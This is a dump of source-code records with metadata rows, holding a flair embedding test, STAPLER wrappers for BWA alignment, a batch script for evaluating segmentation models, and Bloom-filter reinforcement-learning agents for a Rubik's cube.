assert ref_embedding_size == actual_embedding_size
@pytest.mark.slow
def test_transformer_xl_embeddings():
transfo_model: str = "transfo-xl-wt103"
tokenizer = TransfoXLTokenizer.from_pretrained(transfo_model)
model = TransfoXLModel.from_pretrained(
pretrained_model_name_or_path=transfo_model, output_hidden_states=True
)
model.to(flair.device)
model.eval()
s: str = "Berlin and Munich have a lot of puppeteer to see ."
with torch.no_grad():
tokens = tokenizer.tokenize(s + "<eos>")
print(tokens)
indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
tokens_tensor = torch.tensor([indexed_tokens])
tokens_tensor = tokens_tensor.to(flair.device)
hidden_states = model(tokens_tensor)[-1]
first_layer = hidden_states[1][0]
assert len(first_layer) == len(tokens)
# 0 1 2 3 4 5 6 7 8 9 10 11
#
# 'Berlin', 'and', 'Munich', 'have', 'a', 'lot', 'of', 'puppeteer', 'to', 'see', '.', '<eos>'
# | | | | | | | | | | |
# Berlin and Munich have a lot of puppeteer to see .
#
# 0 1 2 3 4 5 6 7 8 9 10
def embed_sentence(
sentence: str, layers: str = "1", use_scalar_mix: bool = False
) -> Sentence:
embeddings = TransformerXLEmbeddings(
pretrained_model_name_or_path=transfo_model,
layers=layers,
use_scalar_mix=use_scalar_mix,
)
flair_sentence = Sentence(sentence)
embeddings.embed(flair_sentence)
return flair_sentence
sentence = embed_sentence(sentence=s)
first_token_embedding_ref = first_layer[0].tolist()
first_token_embedding_actual = sentence.tokens[0].embedding.tolist()
puppeteer_embedding_ref = first_layer[7].tolist()
puppeteer_embedding_actual = sentence.tokens[7].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert puppeteer_embedding_ref == puppeteer_embedding_actual
# Check embedding dimension when using multiple layers
sentence_mult_layers = embed_sentence(sentence="Munich", layers="1,2,3,4")
ref_embedding_size = 4 * model.d_embed
actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
assert ref_embedding_size == actual_embedding_size
# Check embedding dimension when using multiple layers and scalar mix
sentence_mult_layers_scalar_mix = embed_sentence(
sentence="Berlin", layers="1,2,3,4", use_scalar_mix=True
)
ref_embedding_size = 1 * model.d_embed
actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
assert ref_embedding_size == actual_embedding_size
@pytest.mark.slow
def test_xlm_embeddings():
xlm_model: str = "xlm-mlm-en-2048"
tokenizer = XLMTokenizer.from_pretrained(xlm_model)
model = XLMModel.from_pretrained(
pretrained_model_name_or_path=xlm_model, output_hidden_states=True
)
model.to(flair.device)
model.eval()
s: str = "Berlin and Munich have a lot of puppeteer to see ."
with torch.no_grad():
tokens = tokenizer.tokenize("<s>" + s + "</s>")
indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
tokens_tensor = torch.tensor([indexed_tokens])
tokens_tensor = tokens_tensor.to(flair.device)
hidden_states = model(tokens_tensor)[-1]
first_layer = hidden_states[1][0]
assert len(first_layer) == len(tokens)
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
#
# <s> 'berlin</w>', 'and</w>', 'munich</w>', 'have</w>', 'a</w>', 'lot</w>', 'of</w>', 'pupp', 'ete', 'er</w>', 'to</w>', 'see</w>', '.</w>', '</s>
# | | | | | | | \ | / | | |
# Berlin and Munich have a lot of puppeteer to see .
#
# 0 1 2 3 4 5 6 7 8 9 10
def embed_sentence(
sentence: str,
pooling_operation,
layers: str = "1",
use_scalar_mix: bool = False,
) -> Sentence:
embeddings = XLMEmbeddings(
pretrained_model_name_or_path=xlm_model,
layers=layers,
pooling_operation=pooling_operation,
use_scalar_mix=use_scalar_mix,
)
flair_sentence = Sentence(sentence)
embeddings.embed(flair_sentence)
return flair_sentence
# First subword embedding
sentence_first_subword = embed_sentence(sentence=s, pooling_operation="first")
first_token_embedding_ref = first_layer[1].tolist()
first_token_embedding_actual = sentence_first_subword.tokens[0].embedding.tolist()
puppeteer_first_subword_embedding_ref = first_layer[8].tolist()
puppeteer_first_subword_embedding_actual = sentence_first_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_first_subword_embedding_ref
== puppeteer_first_subword_embedding_actual
)
# Last subword embedding
sentence_last_subword = embed_sentence(sentence=s, pooling_operation="last")
first_token_embedding_ref = first_layer[1].tolist()
first_token_embedding_actual = sentence_last_subword.tokens[0].embedding.tolist()
puppeteer_last_subword_embedding_ref = first_layer[10].tolist()
puppeteer_last_subword_embedding_actual = sentence_last_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_last_subword_embedding_ref == puppeteer_last_subword_embedding_actual
)
# First and last subword embedding
sentence_first_last_subword = embed_sentence(
sentence=s, pooling_operation="first_last"
)
first_token_embedding_ref = torch.cat([first_layer[1], first_layer[1]]).tolist()
first_token_embedding_actual = sentence_first_last_subword.tokens[
0
].embedding.tolist()
puppeteer_first_last_subword_embedding_ref = torch.cat(
[first_layer[8], first_layer[10]]
).tolist()
puppeteer_first_last_subword_embedding_actual = sentence_first_last_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_first_last_subword_embedding_ref
== puppeteer_first_last_subword_embedding_actual
)
# Mean of all subword embeddings
sentence_mean_subword = embed_sentence(sentence=s, pooling_operation="mean")
first_token_embedding_ref = calculate_mean_embedding([first_layer[1]]).tolist()
first_token_embedding_actual = sentence_mean_subword.tokens[0].embedding.tolist()
puppeteer_mean_subword_embedding_ref = calculate_mean_embedding(
[first_layer[8], first_layer[9], first_layer[10]]
).tolist()
puppeteer_mean_subword_embedding_actual = sentence_mean_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_mean_subword_embedding_ref == puppeteer_mean_subword_embedding_actual
)
# Check embedding dimension when using multiple layers
sentence_mult_layers = embed_sentence(
sentence="Munich", pooling_operation="first", layers="1,2,3,4"
)
ref_embedding_size = 4 * model.embeddings.embedding_dim
actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
assert ref_embedding_size == actual_embedding_size
# Check embedding dimension when using multiple layers and scalar mix
sentence_mult_layers_scalar_mix = embed_sentence(
sentence="Berlin",
pooling_operation="first",
layers="1,2,3,4",
use_scalar_mix=True,
)
ref_embedding_size = 1 * model.embeddings.embedding_dim
actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
assert ref_embedding_size == actual_embedding_size
| 35.947368
| 154
| 0.660258
| 3,625
| 31,418
| 5.354207
| 0.047172
| 0.078314
| 0.08223
| 0.047607
| 0.92488
| 0.91911
| 0.918491
| 0.900768
| 0.900356
| 0.900304
| 0
| 0.018623
| 0.254822
| 31,418
| 873
| 155
| 35.988545
| 0.809927
| 0.164364
| 0
| 0.711409
| 0
| 0
| 0.029121
| 0
| 0
| 0
| 0
| 0
| 0.100671
| 1
| 0.021812
| false
| 0
| 0.011745
| 0
| 0.045302
| 0.003356
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73513581e39349f68e5aef2d3e95a23083be2f15
| 15,719
|
py
|
Python
|
modules/BWA.py
|
tyrmi/STAPLER
|
fd83eee4be0bb78c67a111fd1c1c1dff4c16aefe
|
[
"BSD-3-Clause"
] | 4
|
2017-07-17T07:45:39.000Z
|
2021-01-12T00:33:10.000Z
|
modules/BWA.py
|
tyrmi/STAPLER
|
fd83eee4be0bb78c67a111fd1c1c1dff4c16aefe
|
[
"BSD-3-Clause"
] | null | null | null |
modules/BWA.py
|
tyrmi/STAPLER
|
fd83eee4be0bb78c67a111fd1c1c1dff4c16aefe
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from GenericBase import GenericBase
from STAPLERerror import STAPLERerror
from STAPLERerror import VirtualIOError
import utils
class bwa_mem(GenericBase):
"""Class for using BWA MEM algorithm.
Parameters:
in_cmd: String containing a command line
in_dir: Directory object containing input files
out_dir: Directory object containing output files
NOTICE! Keep the directory objects up to date about file edits!
Attributes:
name: Name of the function.
input_type: Input types accepted by this application.
output_types: List of output types produced by the application.
mandatory_args: Args the user be provided in in_cmd when initializing.
user_mandatory_args: Args the user must provide.
remove_user_args: Args that will be removed from the final command.
optional_args: Args that may be part of the command line.
in_cmd: Command entered by user.
parsed_cmd: Final output command as option:value dict.
file_names: Names of output files.
command_ids: File names of input file(s) with no file extensions.
Methods:
get_cmd: Method for getting the final cmd line string for output.
"""
name = 'stapler_bwa_mem'
input_types = {'.fastq', '.fq'}
output_types = ['.sam']
hidden_mandatory_args = ['--!fastq1', '--!reference_path', '--!out']
user_mandatory_args = ['--!reference_path']
remove_user_args = ['--!read_format']
user_optional_args = ['--!read_format', '--!fastq2', '-t', '-k', '-w', '-d',
'-r', '-c', '-A', '-B', '-O', '-E', '-L', '-U', '-R', '-v',
'-M', '-T', '-P', '-p', '-C', '-H']
parallelizable = True
help_description = '''
Both paired-end and single-end data can be used as input but not at the same
time. Paired-end mode is used when --!read_format argument is present in the
command line, otherwise single-end data is assumed.
--!read_format argument is mandatory if you have paired-end data.
This argument indicates the format in which read number is shown in
file names. For instance if you have paired end files samplename_R1 and
samplename_R2, the --!read_format argument should look like this:
--!read_format _R?
--!reference_path argument is the path to index database file created by
applying 'bwa index' to your reference fasta file. You must do this manually.
'''
def _select_IO(self, out_cmd, in_dir, out_dir):
"""Infers the input and output file paths.
This method must keep the directory objects up to date of the file
edits!
Parameters:
in_cmd: A dict containing the command line.
in_dir: Input directory.
out_dir: Output directory.
Returns:
out_cmd: Dict containing the output commands
command_identifier: Input file name based identifier for the current command
Raises:
VirtualIOError: No valid input file can be found.
"""
command_ids = []
if '--!reference_path' not in self.parsed_in_cmd:
raise STAPLERerror('--!reference_path argument is required for this '
'command!')
if not os.path.isfile(self.parsed_in_cmd['--!reference_path']):
raise STAPLERerror('The path to reference file does not exist:\n{0}'
.format(self.parsed_in_cmd['--!reference_path']))
read_format = ''
for arg, value in out_cmd.iteritems():
if arg == '--!read_format':
read_format = value
break
if read_format:
if read_format.count('?') != 1:
raise STAPLERerror('{0} needs a one "?" in --!read_format argument!'
.format(self.name))
if len(read_format) < 2:
raise STAPLERerror('{0} argument --!read_format value should have '
'length of at least 2!'
.format(self.name))
del out_cmd[arg]
IO_files = {}
#Handle paired end files
if read_format:
paired_files = in_dir.file_pairs(pattern=self.parsed_in_cmd['--!read_format'],
user=self.name,
file_formats=list(self.input_types),
exclusion_iterable=['pairless',
'unmatched'])
file_names = set()
for pair in paired_files:
pair1, pair2 = pair
if self.name not in in_dir.file_names[pair1].users and self.name not in in_dir.file_names[pair2].users:
#Infer inputs
IO_files['--!fastq1'] = os.path.join(in_dir.path, pair1)
command_ids.append(utils.infer_path_id(IO_files['--!fastq1']))
in_dir.use_file(pair1, self.name)
IO_files['--!fastq2'] = os.path.join(in_dir.path, pair2)
command_ids.append(utils.infer_path_id(IO_files['--!fastq2']))
in_dir.use_file(pair2, self.name)
#Infer output
output_name = utils.splitext(pair1)[0]
output_name = output_name.replace(self.parsed_in_cmd[
'--!read_format'],
'')
output_name += self.output_types[0]
output_path = os.path.join(out_dir.path, output_name)
IO_files['--!out'] = output_path
file_names.add(output_name)
out_dir.add_file(output_name)
break
else: #Handle single end files
file_names = set()
for fl in in_dir.files:
if self.name not in fl.users:
if utils.splitext(fl.name)[-1] in self.input_types:
IO_files['--!fastq1'] = os.path.join(in_dir.path, fl.name)
command_ids.append(utils.infer_path_id(IO_files['--!fastq1']))
in_dir.use_file(fl.name, self.name)
assert len(self.output_types) == 1, 'Several output ' \
'types, override ' \
'this method!'
output_name = utils.splitext(fl.name)[0] + \
self.output_types[0]
output_path = os.path.join(out_dir.path, output_name)
IO_files['--!out'] = output_path
file_names.add(output_name)
out_dir.add_file(output_name)
break
if not IO_files:
raise VirtualIOError('No more unused input files')
out_cmd.update(IO_files)
return out_cmd, command_ids
def get_cmd(self):
"""Returns the final command line.
Returns:
final_cmd: List of command line produced by the object (line breaks not allowed within command lines!).
"""
run_command = utils.parse_config(self.name, 'cmd_name', 'execute')
final_cmd = [run_command]
for arg, val in self.out_cmd.iteritems():
if arg in ['--!reference_path',
'--!fastq1',
'--!fastq2',
'--!out']:
continue
final_cmd.append(arg + ' ' + val)
final_cmd.append(self.out_cmd['--!reference_path'])
final_cmd.append(self.out_cmd['--!fastq1'])
if '--!fastq2' in self.out_cmd:
final_cmd.append(self.out_cmd['--!fastq2'])
final_cmd.append('> ' + self.out_cmd['--!out'])
return [' '.join(final_cmd)]
class bwa_bwasw(GenericBase):
"""Class for using BWA MEM algorithm.
Parameters:
in_cmd: String containing a command line
in_dir: Directory object containing input files
out_dir: Directory object containing output files
NOTICE! Keep the directory objects up to date about file edits!
Attributes:
name: Name of the function.
input_type: Input types accepted by this application.
output_types: List of output types produced by the application.
mandatory_args: Args the user be provided in in_cmd when initializing.
user_mandatory_args: Args the user must provide.
remove_user_args: Args that will be removed from the final command.
optional_args: Args that may be part of the command line.
in_cmd: Command entered by user.
parsed_cmd: Final output command as option:value dict.
file_names: Names of output files.
command_ids: File names of input file(s) with no file extensions.
Methods:
get_cmd: Method for getting the final cmd line string for output.
"""
name = 'stapler_bwa_bwasw'
input_types = {'.fastq', '.fq'}
output_types = ['.sam']
hidden_mandatory_args = ['--!fastq1', '--!reference_path', '--!out']
user_mandatory_args = ['--!reference_path']
remove_user_args = []
user_optional_args = ['--!read_format', '-a', '-b', '-q', '-r', '-w', '-m',
'-t', '-H', '-C', '-M', '-S', '-I', '-T', '-c', '-z',
'-s', '-N', '-G']
parallelizable = True
help_description = '''
Both paired-end and single-end data can be used as input but not at the same
time. Paired-end mode is used when --!read_format argument is present in the
command line, otherwise single-end data is assumed.
--!read_format argument is mandatory if you have paired-end data.
This argument indicates the format in which read number is shown in
file names. For instance if you have paired end files samplename_R1 and
samplename_R2, the --!read_format argument should look like this:
--!read_format _R?
--!reference_path argument is the path to index database file created by
applying 'bwa index' to your reference fasta file. You must do this manually.
'''
def _select_IO(self, out_cmd, in_dir, out_dir):
"""Infers the input and output file paths.
This method must keep the directory objects up to date of the file
edits!
Parameters:
in_cmd: A dict containing the command line.
in_dir: Input directory.
out_dir: Output directory.
Returns:
out_cmd: Dict containing the output commands
command_identifier: Input file name based identifier for the current command
Raises:
VirtualIOError: No valid input file can be found.
"""
command_ids = []
if '--!reference_path' not in self.parsed_in_cmd:
raise STAPLERerror('--!reference_path argument is required for this '
'command!')
if not os.path.isfile(self.parsed_in_cmd['--!reference_path']):
raise STAPLERerror('The path to reference file does not exist:\n{0}'
.format(self.parsed_in_cmd['--!reference_path']))
read_format = ''
for arg, value in out_cmd.iteritems():
if arg == '--!read_format':
read_format = value
break
if read_format:
if read_format.count('?') != 1:
raise STAPLERerror('{0} needs a one "?" in --!read_format argument!'
.format(self.name))
if len(read_format) < 2:
raise STAPLERerror('{0} argument --!read_format value should have '
'length of at least 2!'
.format(self.name))
del out_cmd[arg]
IO_files = {}
#Handle paired end files
if read_format:
paired_files = in_dir.file_pairs(pattern=self.parsed_in_cmd['--!read_format'],
user=self.name,
file_formats=list(self.input_types),
exclusion_iterable=['pairless',
'unmatched'])
file_names = set()
for pair in paired_files:
pair1, pair2 = pair
if self.name not in in_dir.file_names[pair1].users and self.name not in in_dir.file_names[pair2].users:
#Infer inputs
IO_files['--!fastq1'] = os.path.join(in_dir.path, pair1)
command_ids.append(utils.infer_path_id(IO_files['--!fastq1']))
in_dir.use_file(pair1, self.name)
IO_files['--!fastq2'] = os.path.join(in_dir.path, pair2)
command_ids.append(utils.infer_path_id(IO_files['--!fastq2']))
in_dir.use_file(pair2, self.name)
#Infer output
output_name = utils.splitext(pair1)[0]
output_name = output_name.replace(self.parsed_in_cmd[
'--!read_format'],
'')
output_name += self.output_types[0]
output_path = os.path.join(out_dir.path, output_name)
IO_files['--!out'] = output_path
file_names.add(output_name)
out_dir.add_file(output_name)
break
else: #Handle single end files
file_names = set()
for fl in in_dir.files:
if self.name not in fl.users:
if utils.splitext(fl.name)[-1] in self.input_types:
IO_files['--!fastq1'] = os.path.join(in_dir.path, fl.name)
command_ids.append(utils.infer_path_id(IO_files['--!fastq']))
in_dir.use_file(fl.name, self.name)
assert len(self.output_types) == 1, 'Several output ' \
'types, override ' \
'this method!'
output_name = utils.splitext(fl.name)[0] + \
self.output_types[0]
output_path = os.path.join(out_dir.path, output_name)
IO_files['--!out'] = output_path
file_names.add(output_name)
out_dir.add_file(output_name)
break
if not IO_files:
raise VirtualIOError('No more unused input files')
out_cmd.update(IO_files)
return out_cmd, command_ids
def get_cmd(self):
"""Returns the final command line.
Returns:
final_cmd: List of command line produced by the object (line breaks not allowed within command lines!).
"""
run_command = utils.parse_config(self.name, 'cmd_name', 'execute')
final_cmd = [run_command]
for arg, val in self.out_cmd.iteritems():
if arg in ['--!reference_path',
'--!fastq1',
'--!fastq2',
'--!out']:
continue
final_cmd.append(arg + ' ' + val)
final_cmd.append(self.out_cmd['--!reference_path'])
final_cmd.append(self.out_cmd['--!fastq1'])
if '--!fastq2' in self.out_cmd:
final_cmd.append(self.out_cmd['--!fastq2'])
final_cmd.append('> ' + self.out_cmd['--!out'])
return [' '.join(final_cmd)]
| 44.65625
| 119
| 0.549844
| 1,865
| 15,719
| 4.447185
| 0.124933
| 0.039788
| 0.01688
| 0.018085
| 0.974439
| 0.96817
| 0.96817
| 0.96817
| 0.96817
| 0.96817
| 0
| 0.006865
| 0.351358
| 15,719
| 352
| 120
| 44.65625
| 0.806591
| 0.197595
| 0
| 0.92
| 0
| 0
| 0.224979
| 0
| 0
| 0
| 0
| 0
| 0.008889
| 1
| 0.017778
| false
| 0
| 0.022222
| 0
| 0.146667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dfe985593a8641cbc797d00ff486247afdfaba3
| 580
|
py
|
Python
|
eval_covid20cases_timm-regnetx_002_ImageCompression.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_ImageCompression.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_ImageCompression.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os
ls=["python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_0_ImageCompression.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_1_ImageCompression.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_2_ImageCompression.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_3_ImageCompression.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_4_ImageCompression.yml",
]
for l in ls:
os.system(l)
| 52.727273
| 110
| 0.856897
| 80
| 580
| 5.8375
| 0.3
| 0.107066
| 0.12848
| 0.203426
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0
| 0.054645
| 0.053448
| 580
| 11
| 111
| 52.727273
| 0.795993
| 0
| 0
| 0
| 0
| 0
| 0.886403
| 0.671256
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b43a86d9d03e750fe2d90844bf9a46cd960135ff
| 11,492
|
py
|
Python
|
rl3/agent/bloom.py
|
leferrad/rl-3
|
b8cd81efc0d2619a31790d5e919c44fa1526d344
|
[
"BSD-3-Clause"
] | null | null | null |
rl3/agent/bloom.py
|
leferrad/rl-3
|
b8cd81efc0d2619a31790d5e919c44fa1526d344
|
[
"BSD-3-Clause"
] | null | null | null |
rl3/agent/bloom.py
|
leferrad/rl-3
|
b8cd81efc0d2619a31790d5e919c44fa1526d344
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""""""
__author__ = 'leferrad'
from sklearn.linear_model import PassiveAggressiveRegressor, SGDRegressor
from bloom_filter import BloomFilter
import numpy as np
class SGDRegressor2:
def __init__(self, D, lr=1e-4):
self.w = np.random.randn(D) / np.sqrt(D)
self.lr = lr
def partial_fit(self, x, y, e):
if isinstance(x, np.ndarray) is False:
x = np.array(x)
if isinstance(y, np.ndarray) is False:
y = np.array(y)
self.w += self.lr*(y - x.dot(self.w))*e
def predict(self, x):
x = np.array(x)
return x.dot(self.w)
class QubeBloomRegAgent(object):
def __init__(self, env, feature_transformer):
self.env = env
self.models = {}
self.feature_transformer = feature_transformer
for a in env.actions_available:
self.models[a] = SGDRegressor(loss='squared_epsilon_insensitive', penalty='l2',
alpha=0.01, fit_intercept=True,
shuffle=False, epsilon=0.1, learning_rate='optimal',
eta0=0.01, power_t=0.25)
self.bloom_states = BloomFilter(max_elements=256**2)
def predict_from_action(self, s, a):
X = self.feature_transformer.transform(s, normalize=True)
try:
y = self.models[a].predict(X)[0]
except:
y = 0.0
return y
def predict(self, s):
return np.array([self.predict_from_action(s, a) for a in self.models.keys()])
def update(self, s, a, G, gamma=0.99, lambda_=0.7):
X = self.feature_transformer.transform(s, normalize=True)
self.models[a].partial_fit(np.array([X]), np.array([G]))
def sample_action(self, s, eps):
x = tuple(self.feature_transformer.transform(s, normalize=False))
if x in self.bloom_states:
# Maybe it's a seen state
actions = self.models.keys()
G = [self.predict_from_action(s, a) for a in self.models.keys()]
if np.max(G) > 1.0:
# It's a good state to exploit
self.bloom_states.add(x)
return actions[np.argmax(G)]
else:
# It's not important, so we can explore
self.bloom_states.add(x)
return self.env.sample_action()
else:
# It's not a seen state, so we can explore
self.bloom_states.add(x)
return self.env.sample_action()
class QubeBloomDualRegAgent(object):
def __init__(self, env, feature_transformer):
self.env = env
self.models = {}
self.models_elite = {}
self.feature_transformer = feature_transformer
for a in env.actions_available:
self.models[a] = SGDRegressor(loss='epsilon_insensitive', penalty='l2',
alpha=0.001, fit_intercept=True,
shuffle=False, epsilon=0.01, learning_rate='constant',
eta0=0.01, power_t=0.25)
self.models_elite[a] = SGDRegressor(loss='epsilon_insensitive', penalty='l2',
alpha=0.001, fit_intercept=True,
shuffle=False, epsilon=0.01, learning_rate='constant',
eta0=0.01)
self.bloom_states = BloomFilter(max_elements=256**2)
def predict(self, s):
return np.array([self.predict_from_action(s, a) for a in self.models.keys()])
def predict_from_action(self, s, a):
X = self.feature_transformer.transform(s, normalize=True)
try:
y = self.models[a].predict(X)[0]
except:
y = 0.0
return y
def predict_from_action_elite(self, s, a):
X = self.feature_transformer.transform(s, normalize=True)
try:
y = self.models_elite[a].predict(X)[0]
except:
y = 0.0
return y
def update(self, s, a, G, gamma=0.99, lambda_=0.7):
X = self.feature_transformer.transform(s, normalize=True)
self.models[a].partial_fit(np.array([X]), np.array([G]))
if G > 1.0:
self.models_elite[a].partial_fit(np.array([X]), np.array([G]))
def sample_action(self, s, eps):
x = tuple(self.feature_transformer.transform(s, normalize=False))
if x in self.bloom_states:
# Maybe it's a seen state
actions = self.models.keys()
G = [self.predict_from_action(s, a) for a in self.models.keys()]
max_G = np.max(G)
G_elite = [self.predict_from_action_elite(s, a) for a in self.models_elite.keys()]
max_G_elite = np.max(G_elite)
if (max_G_elite - max(0.0, max_G)) > 0.5 and max_G_elite >= 1.0:
print "Taking an elitist action!"
a = actions[np.argmax(G_elite)]
return a
else:
# First, I need to update the elite models
a = actions[np.argmax(G)]
#X = self.feature_transformer.transform(s, normalize=True)
#self.models_elite[a].partial_fit(np.array([X]), np.array([max_G]))
if max_G > 1.0:
# It's a good state to exploit
#self.bloom_states.add(x)
return a
else:
# It's not important, so we can explore
#self.bloom_states.add(x)
return self.env.sample_action()
else:
# It's not a seen state, so we can explore
self.bloom_states.add(x)
return self.env.sample_action()
class QubeBloomPARAgent(object):
def __init__(self, env, feature_transformer):
self.env = env
self.models = {}
self.feature_transformer = feature_transformer
for a in env.actions_available:
self.models[a] = PassiveAggressiveRegressor(C=1.0, fit_intercept=True, shuffle=False)
self.bloom_states = BloomFilter(max_elements=256**2)
self.nonseen_states = 0
def predict(self, s):
return np.array([self.predict_from_action(s, a) for a in self.models.keys()])
def predict_from_action(self, s, a):
X = self.feature_transformer.transform(s, normalize=True)
try:
y = self.models[a].predict(X)[0]
except:
y = 0.0
return y
def update(self, s, a, G, gamma=0.99, lambda_=0.7):
X = self.feature_transformer.transform(s, normalize=True)
self.models[a].partial_fit(np.array([X]), np.array([G]))
def sample_action(self, s, eps):
x = tuple(self.feature_transformer.transform(s, normalize=False))
if x in self.bloom_states:
# Maybe it's a seen state
actions = self.models.keys()
G = [self.predict_from_action(s, a) for a in self.models.keys()]
if np.max(G) > 1.0:
# It's a good state to exploit
self.bloom_states.add(x)
return actions[np.argmax(G)]
else:
# It's not important, so we can explore
self.bloom_states.add(x)
return self.env.sample_action()
else:
# It's not a seen state, so we can explore
self.nonseen_states += 1
self.bloom_states.add(x)
return self.env.sample_action()
class QubeBloomDualPARAgent(object):
def __init__(self, env, feature_transformer):
self.env = env
self.models = {}
self.models_elite = {}
self.feature_transformer = feature_transformer
for a in env.actions_available:
self.models[a] = PassiveAggressiveRegressor(C=1.0, fit_intercept=True, shuffle=False,
loss='epsilon_insensitive', epsilon=0.1)
self.models_elite[a] = PassiveAggressiveRegressor(C=1.0, fit_intercept=True, shuffle=False,
loss='epsilon_insensitive', epsilon=0.1)
self.bloom_states = BloomFilter(max_elements=256**2)
def predict(self, s):
return np.array([self.predict_from_action(s, a) for a in self.models.keys()])
def predict_from_action(self, s, a):
X = self.feature_transformer.transform(s, normalize=True)
try:
y = self.models[a].predict(X)[0]
except:
y = 0.0
return y
def predict_from_action_elite(self, s, a):
X = self.feature_transformer.transform(s, normalize=True)
try:
y = self.models_elite[a].predict(X)[0]
except:
y = 0.0
return y
def update(self, s, a, G, gamma=0.99, lambda_=0.7):
X = self.feature_transformer.transform(s, normalize=True)
self.models[a].partial_fit(np.array([X]), np.array([G]))
if G > 1.0:
self.models_elite[a].partial_fit(np.array([X]), np.array([G]))
def sample_action(self, s, eps):
x = tuple(self.feature_transformer.transform(s, normalize=False))
if x in self.bloom_states:
# Maybe it's a seen state
actions = self.models.keys()
G = [self.predict_from_action(s, a) for a in self.models.keys()]
max_G = np.max(G)
G_elite = [self.predict_from_action_elite(s, a) for a in self.models_elite.keys()]
max_G_elite = np.max(G_elite)
if (max_G_elite - max(0.0, max_G)) > 0.5 and max_G_elite >= 1.0:
#print "Taking an elitist action!"
a = actions[np.argmax(G_elite)]
return a
else:
# First, I need to update the elite models
a = actions[np.argmax(G)]
#X = self.feature_transformer.transform(s, normalize=True)
#self.models_elite[a].partial_fit(np.array([X]), np.array([max_G]))
if max_G > 0.0:
# It's a good state to exploit
#self.bloom_states.add(x)
return a
else:
# It's not important, so we can explore
#self.bloom_states.add(x)
return self.env.sample_action()
else:
# It's not a seen state, so we can explore
self.bloom_states.add(x)
return self.env.sample_action()
def play_one(model, env, eps, gamma=0.99, lambda_=0.7, max_iters=1000):
env.actions_taken = [] # Reset actions taken on the scramble stage
observation = env.get_state()
total_reward = 0
iters = 0
while not env.is_solved() and iters < max_iters:
# Make a movement
action = model.sample_action(observation, eps)
prev_observation = observation
observation, reward, solved = env.take_action(action)
total_reward += reward
if env.is_solved():
print "WOW! The cube is solved! Algorithm followed: %s" % str(env.actions_taken)
# Update the model
next_state = model.predict(observation)
# assert(len(next_state.shape) == 1)
G = reward + gamma*np.max(next_state)
model.update(prev_observation, action, G, gamma, lambda_)
iters += 1
return total_reward
| 38.05298
| 103
| 0.557779
| 1,513
| 11,492
| 4.09121
| 0.107072
| 0.06462
| 0.071082
| 0.080129
| 0.826979
| 0.826979
| 0.819063
| 0.813247
| 0.801939
| 0.801939
| 0
| 0.019111
| 0.330665
| 11,492
| 302
| 104
| 38.05298
| 0.785621
| 0.098938
| 0
| 0.770642
| 0
| 0
| 0.020549
| 0.002617
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.018349
| 0.013761
| null | null | 0.009174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b46a54ae29aaa759c6eb033495b9e8a3e7aba747
| 141
|
py
|
Python
|
environment/gym-Continuous/gym_Continuous/envs/__init__.py
|
nickplas/Internship_ESTECO
|
576039255a7f087585e19f323873f8e5dc2af39b
|
[
"Apache-2.0"
] | 2
|
2021-03-05T02:11:43.000Z
|
2021-04-23T13:18:16.000Z
|
environment/gym-Continuous/gym_Continuous/envs/__init__.py
|
nickplas/Internship_ESTECO
|
